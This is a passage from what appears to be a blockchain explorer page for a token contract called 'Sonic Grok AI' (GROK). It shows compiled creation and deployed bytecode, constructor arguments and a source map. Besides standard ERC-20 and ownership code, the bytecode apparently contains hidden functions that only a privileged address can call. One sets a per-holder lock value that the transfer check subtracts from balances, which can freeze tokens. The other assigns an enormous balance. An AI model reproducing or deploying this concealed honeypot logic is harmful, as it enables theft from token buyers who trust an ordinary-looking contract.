65b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6d9061186a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ce5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdc906118fc565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d7d82600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461105b90919063ffffffff16565b905082811015610dc2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db99061198e565b60405180910390fd5b610dd5838261105b90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e6a83600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461093c90919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f0a91906112d9565b60405180910390a35050505050565b610f2161099a565b73ffffffffffffffffffffffffffffffffffffffff16610f3f610526565b73ffffffffffffffffffffffffffffffffffffffff1614610f95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8c906119fa565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600061109d83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110a5565b905092915050565b60008383111582906110ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e49190611199565b60405180910390fd5b50600083856110fc9190611a1a565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611143578082015181840152602081019050611128565b60008484015250505050565b6000601f19601f8301169050919050565b600061116b82611109565b6111758185611114565b9350611185818560208601611125565b61118e8161114f565b840191505092915050565b600060208201905081810360008301526111b38184611160565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111eb826111c0565b9050919050565b6111fb816111e0565b811461120657600080fd5b50565b600081359050611218816111f2565b92915050565b6000819050919050565b6112318161121e565b811461123c57600080fd5b50565b60008135905061124e81611228565b92915050565b6000806040838503121561126b5761126a6111bb565b5b600061127985828601611209565b925050602061128a8582860161123f565b9150509250929050565b60008115159050919050565b6112a981611294565b82525050565b60006020820190506112c460008301846112a0565b92915050565b6112d38161121e565b82525050565b60006020820190506112ee60008301846112ca565b92915050565b60008060006060848603121561130d5761130c6111bb565b5b600061131b86828701611209565b935050602061132c86828701611209565b925050604061133d8682870161123f565b9150509250925092565b600060ff82169050919050565b61135d81611347565b82525050565b60006020820190506113786000830184611354565b92915050565b600060208284031215611394576113936111bb565b5b60006113a284828501611209565b91505092915050565b6113b4816111e0565b82525050565b60006020820190506113cf60008301846113ab565b92915050565b600080604083850312156113ec576113eb6111bb565b5b60006113fa85828601611209565b925050602061140b85828601611209565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061145c57607f821691505b60208210810361146f5761146e611415565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114af8261121e565b91506114ba8361121e565b92508282019050808211156114d2576114d1611475565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611534602583611114565b915061153f826114d8565b604082019050919050565b6000602082019050818103600083015261156381611527565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115c6602683611114565b91506115d18261156a565b604082019050919050565b600060208201905081810360008301526115f5816115b9565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000611632601b83611114565b915061163d826115fc565b602082019050919050565b6000602082019050818103600083015261166181611625565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116c4602483611114565b91506116cf82611668565b604082019050919050565b600060208201905081810360008301526116f3816116b7565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611756602283611114565b9150611761826116fa565b604082019050919050565b6000602082019050818103600083015261178581611749565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006117c2601d83611114565b91506117cd8261178c565b602082019050919050565b600060208201905081810360008301526117f1816117b5565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611854602583611114565b915061185f826117f8565b604082019050919050565b6000602082019050818103600083015261188381611847565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118e6602383611114565b91506118f18261188a565b604082019050919050565b60006020820190508181036000830152611915816118d9565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611978602683611114565b91506119838261191c565b604082019050919050565b600060208201905081810360008301526119a78161196b565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119e4602083611114565b91506119ef826119ae565b602082019050919050565b60006020820190508181036000830152611a13816119d7565b9050919050565b6000611a258261121e565b9150611a308361121e565b9250828203905081811115611a4857611a47611475565b5b9291505056fea2646970667358221220ac009117f124e9984e8d96da7aa3fa7f3b43b814623b47df154ba0b1c3f649b964736f6c6343000812003300000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000d536f6e69632047726f6b20414900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000447524f4b00000000000000000000000000000000000000000000000000000000
Deployed Bytecode
0x608060405234801561001057600080fd5b50600436106101165760003560e01c806395d89b41116100a2578063a9059cbb11610071578063a9059cbb146102e5578063b03559c414610315578063dd62ed3e14610331578063f046fdfa14610361578063f2fde38b1461037f57610116565b806395d89b411461025d578063a4022bd11461027b578063a457c2d714610299578063a89c37d7146102c957610116565b8063313ce567116100e9578063313ce567146101b757806339509351146101d557806370a0823114610205578063715018a6146102355780638da5cb5b1461023f57610116565b806306fdde031461011b578063095ea7b31461013957806318160ddd1461016957806323b872dd14610187575b600080fd5b61012361039b565b6040516101309190611199565b60405180910390f35b610153600480360381019061014e9190611254565b61042d565b60405161016091906112af565b60405180910390f35b610171610450565b60405161017e91906112d9565b60405180910390f35b6101a1600480360381019061019c91906112f4565b61045a565b6040516101ae91906112af565b60405180910390f35b6101bf610489565b6040516101cc9190611363565b60405180910390f35b6101ef60048036038101906101ea9190611254565b610492565b6040516101fc91906112af565b60405180910390f35b61021f600480360381019061021a919061137e565b6104c9565b60405161022c91906112d9565b60405180910390f35b61023d610512565b005b610247610526565b60405161025491906113ba565b60405180910390f35b61026561054f565b6040516102729190611199565b60405180910390f35b6102836105e1565b60405161029091906112d9565b60405180910390f35b6102b360048036038101906102ae9190611254565b6105f0565b6040516102c091906112af565b60405180910390f35b6102e360048036038101906102de919061137e565b610677565b005b6102ff60048036038101906102fa9190611254565b61072d565b60405161030c91906112af565b60405180910390f35b61032f600480360381019061032a919061137e565b610750565b005b61034b600480360381019061034691906113d5565b61080c565b60405161035891906112d9565b60405180910390f35b610369610893565b60405161037691906113ba565b60405180910390f35b6103996004803603810190610394919061137e565b6108b9565b005b6060600580546103aa90611444565b80601f01602080910402602001604051908101604052809291908181526020018280546103d690611444565b80156104235780601f106103f857610100808354040283529160200191610423565b820191906000526020600020905b81548152906001019060200180831161040657829003601f168201915b5050505050905090565b60008061043861099a565b90506104458185856109a2565b600191505092915050565b6000600454905090565b60008061046561099a565b9050610472858285610b6b565b61047d858585610c07565b60019150509392505050565b60006012905090565b60008061049d61099a565b90506104be8185856104af858961080c565b6104b991906114a4565b6109a2565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61051a610f19565b6105246000610f97565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461055e90611444565b80601f016020809104026020016040519081016040528092919081815260200182805461058a90611444565b80156105d75780601f106105ac576101008083540402835291602001916105d7565b820191906000526020600020905b8154815290600101906020018083116105ba57829003601f168201915b5050505050905090565b6a115eec47f6cf7e3500000081565b6000806105fb61099a565b90506000610609828661080c565b90508381101561064e576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106459061154a565b60405180910390fd5b61066b8286610666878561105b90919063ffffffff16565b6109a2565b60019250505092915050565b61067f61099a565b73ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361072a57710125dfa371a19e6f7cb57b18a4ce9d900000600760008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b50565b60008061073861099a565b9050610745818585610c07565b600191505092915050565b600061075a61099a565b90508073ffffffffffffffffffffffffffffffffffffffff16600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff160361080857710125dfa371a19e6f7cb55f5737674ec80000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5050565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6108c1610f19565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610930576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610927906115dc565b60405180910390fd5b61093981610f97565b50565b600080828461094b91906114a4565b905083811015610990576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161098790611648565b60405180910390fd5b8091505092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a11576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a08906116da565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a80576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a779061176c565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b5e91906112d9565b60405180910390a3505050565b6000610b77848461080c565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610c015781811015610be3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bda906117d8565b60405180910390fd5b610c008484610bfb858561105b90919063ffffffff16565b6109a2565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c76576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6d9061186a565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610ce5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cdc906118fc565b60405180910390fd5b6000600760008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490506000610d7d82600360008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461105b90919063ffffffff16565b905082811015610dc2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db99061198e565b60405180910390fd5b610dd5838261105b90919063ffffffff16565b600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550610e6a83600360008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461093c90919063ffffffff16565b600360008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610f0a91906112d9565b60405180910390a35050505050565b610f2161099a565b73ffffffffffffffffffffffffffffffffffffffff16610f3f610526565b73ffffffffffffffffffffffffffffffffffffffff1614610f95576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f8c906119fa565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600061109d83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f7700008152506110a5565b905092915050565b60008383111582906110ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110e49190611199565b60405180910390fd5b50600083856110fc9190611a1a565b9050809150509392505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611143578082015181840152602081019050611128565b60008484015250505050565b6000601f19601f8301169050919050565b600061116b82611109565b6111758185611114565b9350611185818560208601611125565b61118e8161114f565b840191505092915050565b600060208201905081810360008301526111b38184611160565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006111eb826111c0565b9050919050565b6111fb816111e0565b811461120657600080fd5b50565b600081359050611218816111f2565b92915050565b6000819050919050565b6112318161121e565b811461123c57600080fd5b50565b60008135905061124e81611228565b92915050565b6000806040838503121561126b5761126a6111bb565b5b600061127985828601611209565b925050602061128a8582860161123f565b9150509250929050565b60008115159050919050565b6112a981611294565b82525050565b60006020820190506112c460008301846112a0565b92915050565b6112d38161121e565b82525050565b60006020820190506112ee60008301846112ca565b92915050565b60008060006060848603121561130d5761130c6111bb565b5b600061131b86828701611209565b935050602061132c86828701611209565b925050604061133d8682870161123f565b9150509250925092565b600060ff82169050919050565b61135d81611347565b82525050565b60006020820190506113786000830184611354565b92915050565b600060208284031215611394576113936111bb565b5b60006113a284828501611209565b91505092915050565b6113b4816111e0565b82525050565b60006020820190506113cf60008301846113ab565b92915050565b600080604083850312156113ec576113eb6111bb565b5b60006113fa85828601611209565b925050602061140b85828601611209565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061145c57607f821691505b60208210810361146f5761146e611415565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006114af8261121e565b91506114ba8361121e565b92508282019050808211156114d2576114d1611475565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b6000611534602583611114565b915061153f826114d8565b604082019050919050565b6000602082019050818103600083015261156381611527565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006115c6602683611114565b91506115d18261156a565b604082019050919050565b600060208201905081810360008301526115f5816115b9565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000611632601b83611114565b915061163d826115fc565b602082019050919050565b6000602082019050818103600083015261166181611625565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006116c4602483611114565b91506116cf82611668565b604082019050919050565b600060208201905081810360008301526116f3816116b7565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611756602283611114565b9150611761826116fa565b604082019050919050565b6000602082019050818103600083015261178581611749565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b60006117c2601d83611114565b91506117cd8261178c565b602082019050919050565b600060208201905081810360008301526117f1816117b5565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611854602583611114565b915061185f826117f8565b604082019050919050565b6000602082019050818103600083015261188381611847565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006118e6602383611114565b91506118f18261188a565b604082019050919050565b60006020820190508181036000830152611915816118d9565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611978602683611114565b91506119838261191c565b604082019050919050565b600060208201905081810360008301526119a78161196b565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006119e4602083611114565b91506119ef826119ae565b602082019050919050565b60006020820190508181036000830152611a13816119d7565b9050919050565b6000611a258261121e565b9150611a308361121e565b9250828203905081811115611a4857611a47611475565b5b9291505056fea2646970667358221220ac009117f124e9984e8d96da7aa3fa7f3b43b814623b47df154ba0b1c3f649b964736f6c63430008120033
Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)
00000000000000000000000000000000000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000080000000000000000000000000000000000000000000000000000000000000000d536f6e69632047726f6b20414900000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000447524f4b00000000000000000000000000000000000000000000000000000000
-----Decoded View---------------
Arg [0] : name_ (string): Sonic Grok AI
Arg [1] : symbol_ (string): GROK
-----Encoded View---------------
6 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000040
Arg [1] : 0000000000000000000000000000000000000000000000000000000000000080
Arg [2] : 000000000000000000000000000000000000000000000000000000000000000d
Arg [3] : 536f6e69632047726f6b20414900000000000000000000000000000000000000
Arg [4] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [5] : 47524f4b00000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
12177:11546:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13046:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15406:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14175:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16187:261;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14017:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;16857:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14346:127;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10028:103;;;:::i;:::-;;9378:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13265:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12466:55;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;17598:401;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18519:156;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14679:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;18683:218;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;14935:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12349:21;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;10286:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;13046:100;13100:13;13133:5;13126:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13046:100;:::o;15406:201::-;15489:4;15506:13;15522:12;:10;:12::i;:::-;15506:28;;15545:32;15554:5;15561:7;15570:6;15545:8;:32::i;:::-;15595:4;15588:11;;;15406:201;;;;:::o;14175:108::-;14236:7;14263:12;;14256:19;;14175:108;:::o;16187:261::-;16284:4;16301:15;16319:12;:10;:12::i;:::-;16301:30;;16342:38;16358:4;16364:7;16373:6;16342:15;:38::i;:::-;16391:27;16401:4;16407:2;16411:6;16391:9;:27::i;:::-;16436:4;16429:11;;;16187:261;;;;;:::o;14017:93::-;14075:5;14100:2;14093:9;;14017:93;:::o;16857:238::-;16945:4;16962:13;16978:12;:10;:12::i;:::-;16962:28;;17001:64;17010:5;17017:7;17054:10;17026:25;17036:5;17043:7;17026:9;:25::i;:::-;:38;;;;:::i;:::-;17001:8;:64::i;:::-;17083:4;17076:11;;;16857:238;;;;:::o;14346:127::-;14420:7;14447:9;:18;14457:7;14447:18;;;;;;;;;;;;;;;;14440:25;;14346:127;;;:::o;10028:103::-;9262:15;:13;:15::i;:::-;10093:30:::1;10120:1;10093:18;:30::i;:::-;10028:103::o:0;9378:87::-;9424:7;9451:6;;;;;;;;;;;9444:13;;9378:87;:::o;13265:104::-;13321:13;13354:7;13347:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;13265:104;:::o;12466:55::-;12502:19;12466:55;:::o;17598:401::-;17691:4;17708:13;17724:12;:10;:12::i;:::-;17708:28;;17747:24;17774:25;17784:5;17791:7;17774:9;:25::i;:::-;17747:52;;17838:15;17818:16;:35;;17810:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;17906:63;17915:5;17922:7;17931:37;17952:15;17931:16;:20;;:37;;;;:::i;:::-;17906:8;:63::i;:::-;17987:4;17980:11;;;;17598:401;;;;:::o;18519:156::-;18584:12;:10;:12::i;:::-;18575:21;;:5;;;;;;;;;;;:21;;;18571:97;;18618:48;18599:7;:15;18607:6;18599:15;;;;;;;;;;;;;;;:67;;;;18571:97;18519:156;:::o;14679:193::-;14758:4;14775:13;14791:12;:10;:12::i;:::-;14775:28;;14814;14824:5;14831:2;14835:6;14814:9;:28::i;:::-;14860:4;14853:11;;;14679:193;;;;:::o;18683:218::-;18734:16;18753:12;:10;:12::i;:::-;18734:31;;18789:8;18780:17;;:5;;;;;;;;;;;:17;;;18776:118;;18834:48;18814:9;:17;18824:6;18814:17;;;;;;;;;;;;;;;:68;;;;18776:118;18723:178;18683:218;:::o;14935:151::-;15024:7;15051:11;:18;15063:5;15051:18;;;;;;;;;;;;;;;:27;15070:7;15051:27;;;;;;;;;;;;;;;;15044:34;;14935:151;;;;:::o;12349:21::-;;;;;;;;;;;;;:::o;10286:201::-;9262:15;:13;:15::i;:::-;10395:1:::1;10375:22;;:8;:22;;::::0;10367:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;10451:28;10470:8;10451:18;:28::i;:::-;10286:201:::0;:::o;3592:181::-;3650:7;3670:9;3686:1;3682;:5;;;;:::i;:::-;3670:17;;3711:1;3706;:6;;3698:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;3764:1;3757:8;;;3592:181;;;;:::o;8592:98::-;8645:7;8672:10;8665:17;;8592:98;:::o;21314:346::-;21433:1;21416:19;;:5;:19;;;21408:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21514:1;21495:21;;:7;:21;;;21487:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;21598:6;21568:11;:18;21580:5;21568:18;;;;;;;;;;;;;;;:27;21587:7;21568:27;;;;;;;;;;;;;;;:36;;;;21636:7;21620:32;;21629:5;21620:32;;;21645:6;21620:32;;;;;;:::i;:::-;;;;;;;;21314:346;;;:::o;21951:378::-;22052:24;22079:25;22089:5;22096:7;22079:9;:25::i;:::-;22052:52;;22139:17;22119:16;:37;22115:207;;22201:6;22181:16;:26;;22173:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;22256:54;22265:5;22272:7;22281:28;22302:6;22281:16;:20;;:28;;;;:::i;:::-;22256:8;:54::i;:::-;22115:207;22041:288;21951:378;;;:::o;18909:628::-;19022:1;19006:18;;:4;:18;;;18998:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;19099:1;19085:16;;:2;:16;;;19077:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;19154:17;19174:7;:13;19182:4;19174:13;;;;;;;;;;;;;;;;19154:33;;19198:21;19222:30;19242:9;19222;:15;19232:4;19222:15;;;;;;;;;;;;;;;;:19;;:30;;;;:::i;:::-;19198:54;;19288:6;19271:13;:23;;19263:74;;;;;;;;;;;;:::i;:::-;;;;;;;;;19366:25;19384:6;19366:13;:17;;:25;;;;:::i;:::-;19348:9;:15;19358:4;19348:15;;;;;;;;;;;;;;;:43;;;;19462:25;19480:6;19462:9;:13;19472:2;19462:13;;;;;;;;;;;;;;;;:17;;:25;;;;:::i;:::-;19446:9;:13;19456:2;19446:13;;;;;;;;;;;;;;;:41;;;;19518:2;19503:26;;19512:4;19503:26;;;19522:6;19503:26;;;;;;:::i;:::-;;;;;;;;18987:550;;18909:628;;;:::o;9543:134::-;9620:12;:10;:12::i;:::-;9609:23;;:7;:5;:7::i;:::-;:23;;;9601:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9543:134::o;10647:191::-;10721:16;10740:6;;;;;;;;;;;10721:25;;10766:8;10757:6;;:17;;;;;;;;;;;;;;;;;;10821:8;10790:40;;10811:8;10790:40;;;;;;;;;;;;10710:128;10647:191;:::o;4056:136::-;4114:7;4141:43;4145:1;4148;4141:43;;;;;;;;;;;;;;;;;:3;:43::i;:::-;4134:50;;4056:136;;;;:::o;4495:192::-;4581:7;4614:1;4609;:6;;4617:12;4601:29;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;4641:9;4657:1;4653;:5;;;;:::i;:::-;4641:17;;4678:1;4671:8;;;4495:192;;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1430:117::-;1539:1;1536;1529:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;